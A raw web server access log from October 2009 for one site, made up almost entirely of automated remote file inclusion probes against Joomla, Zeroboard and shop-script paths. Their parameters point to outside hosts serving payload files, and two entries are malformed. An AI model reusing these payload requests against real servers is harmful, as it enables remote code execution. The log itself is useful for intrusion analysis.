74.205.54.26 - - [30/Oct/2009:09:00:05 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:00:05 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:00:05 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:00:08 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:00:11 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:00:13 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:00:14 -0700] "GET /logs/access_080812.log/errors.php?error=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:28 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:28 -0700] "GET /logs/access_090223.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:28 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:29 -0700] "GET /logs/access_090223.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:29 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:29 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:32 -0700] "GET /logs/access_090223.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:33 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:33 -0700] "GET /logs/access_090223.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:33 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:33 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:00:33 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:00:39 -0700] "GET /logs/access_090721.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.210.109.180 - - [30/Oct/2009:09:00:51 -0700] "GET /logs/access_080925.log//config.kochsuite.php?mosConfig_absolute_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.210.109.180 - - [30/Oct/2009:09:00:55 -0700] "GET /logs/access_090809.log//config.kochsuite.php?mosConfig_absolute_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.210.109.180 - - [30/Oct/2009:09:00:59 -0700] "GET /logs/access_080925.log//config.kochsuite.php?mosConfig_absolute_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.210.109.180 - - [30/Oct/2009:09:01:03 -0700] "GET /logs/access_090809.log//config.kochsuite.php?mosConfig_absolute_path=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:01:17 -0700] "GET /logs/access_080619.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:01:17 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.rovest.com////language/id.txt?? HTTP/1.1" 200 16067 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:01:17 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.rovest.com////language/id.txt?? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:01:20 -0700] "GET /logs/access_090327.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:01:22 -0700] "GET /logs/access_080209.log%20%20//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:01:22 -0700] "GET /logs//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:01:22 -0700] "GET /logs/access_090327.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:01:25 -0700] "GET /administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:01:25 -0700] "GET /logs/access_080619.log%20%20//administrator/components/com_jcs/views/list.user.sub.html.php=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:01:25 -0700] "GET /logs/access_090327.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.192.20.164 - - [30/Oct/2009:09:01:29 -0700] "GET /logs/access_090327.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.mysecl.com/board/editor/idv6.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:32 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:32 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:32 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:34 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:34 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:35 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:37 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:37 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:37 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:01:38 -0700] "GET /logs/access_080326.log%20%20/administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:01:38 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:01:38 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:38 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:38 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:38 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:39 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:39 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:39 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:39 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:40 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:40 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:40 -0700] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:40 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:40 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:43 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:45 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:48 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:49 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:49 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:50 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:01:50 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.252.90.80 - - [30/Oct/2009:09:01:51 -0700] "GET /admin/auth.php?xcart_dir=http://www.kannunci.it/case/apache.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:01:56 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:01:56 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:02:10 -0700] "GET /logs/access_090501.log%20//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:02:12 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 200 123788 "-" "libwww-perl/5.65" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:02:12 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/chid.txt??? HTTP/1.1" 200 16054 "-" "libwww-perl/5.65" "www.dmulk.com"
208.49.206.117 - - [30/Oct/2009:09:02:36 -0700] "GET /logs/access_090130.log//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [30/Oct/2009:09:02:36 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [30/Oct/2009:09:02:37 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
208.49.206.117 - - [30/Oct/2009:09:02:38 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 200 16057 "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [30/Oct/2009:09:02:41 -0700] "GET /logs/access_080710.log//?_SERVER[DOCUMENT_ROOT]=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:09:03:03 -0700] "GET /logs/access_080201.log/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:09:03:03 -0700] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.121.169.156 - - [30/Oct/2009:09:03:03 -0700] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.myluxurychalet.com/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:03:43 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:03:43 -0700] "GET /logs/access_090605.log/administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:03:43 -0700] "GET /logs/access_080326.log/administrator/components/com_mgm/help.mgm.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.186.15.126 - - [30/Oct/2009:09:03:49 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.coselle.com/adminpanel/linksdir/joomla.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
91.186.15.126 - - [30/Oct/2009:09:03:52 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.coselle.com/adminpanel/linksdir/joomla.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:04:06 -0700] "GET /logs/access_080502.log//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:04:06 -0700] "GET /logs/access_080502.log//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:04:07 -0700] "GET /logs//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.0" 200 123761 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:04:07 -0700] "GET /logs//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:04:08 -0700] "GET /?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 16043 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:04:08 -0700] "GET /?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 16043 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:04:10 -0700] "GET /logs/access_080502.log%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22com_simpleboard%22+domain%3Admulk.com'%3EMore%20pages%20from%20dmulk.com%3C/a%3E %3Cbr%3E%3Cbr%3E%3Cbr%20class='lb'%3E%3Ca%20class='res'%20href='http://dholcutzradio.com/playlist.php?letter=Z'%3EDholCutz%20Bhangra%20Radio:%20Punjabi%20Songs%2024/7%3C/a%3E%3Cbr%3E%3Cspan%20class=s%3EDCRadio%20broadcasts%20the%20Best%20Punjabi%20Bhangra%20Music%20Albums.%20%3Cb%3E...%3C/b%3E%20p,%20nusrat%20fateh//components/%3Cb%3Ecom_simplebo%3Cwbr%3Eard%3C/b%3E/imag,%20master%20saleem%20kinna%20sona,%20yarr%20%3Cb%3E...%3C/b%3E%3Cbr%3E%3C/span%3E%3Cspan%20class=ngrn%3Edholcutzradio.com/playlist.php?letter=Z%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22com_simpleboard%22+domain%3Adholcutzradio.com'%3p1r2/us2:200.105.232.78
195.13.191.76 - - [30/Oct/2009:09:04:12 -0700] "GET /logs/access_080226.log%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22com_simpleboard%22+domain%3Admulk.com'%3EMore%20pages%20from%20dmulk.com%3C/a%3E %3Cbr%3E%3Cbr%3E%3Cbr%20class='lb'%3E%3Ca%20class='res'%20href='http://www.prd.co.uk/status/doc'%3EDocument%20Hits%3C/a%3E%3Cbr%3E%3Cspan%20class=s%3E%3Cb%3E...%3C/b%3E%20assets/snippets/reflect/snippe%3Cwbr%3Et.reflect.php%202601%20//components/%3Cb%3Ecom_simpleboard%3C/b%3E%20%3Cb%3E...%3C/b%3E%20components/%3Cb%3Ecom_simpleboard%3C/b%3E%3Cwbr%3E/image_upload.php%20376%20/status/notfound////%20375%20//admin%20%3Cb%3E...%3C/b%3E%3Cbr%3E%3C/span%3E%3Cspan%20class=ngrn%3Ewww.prd.co.uk/status/doc%20%3C/span%3E%20%3Cspan%20class=rgy%3E%3C/span%3E%3Cbr%3E%3Ca%20class=rgy%20href='http://www.altavista.com/web/results?sc=off&q=%22com_simpleboard%22+domain%3Aprd.co.uk'%3EMore%20pages%20from%20prdolga_grie/us1:151.60.188218.238.2.226 - - [30/Oct/2009:09:04:12 -0700] "GET /logs/access_080226.log//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:04:14 -0700] "GET /logs/access_080226.log//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:04:18 -0700] "GET /logs/access_080222.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.rovest.com////language/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:04:18 -0700] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://www.rovest.com////language/id.txt?? HTTP/1.1" 200 16067 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [30/Oct/2009:09:04:18 -0700] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.rovest.com////language/id.txt?? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:04:24 -0700] "GET /logs/access_080502.log//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:04:24 -0700] "GET /?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 16042 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:04:24 -0700] "GET /logs//?_zb_path=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
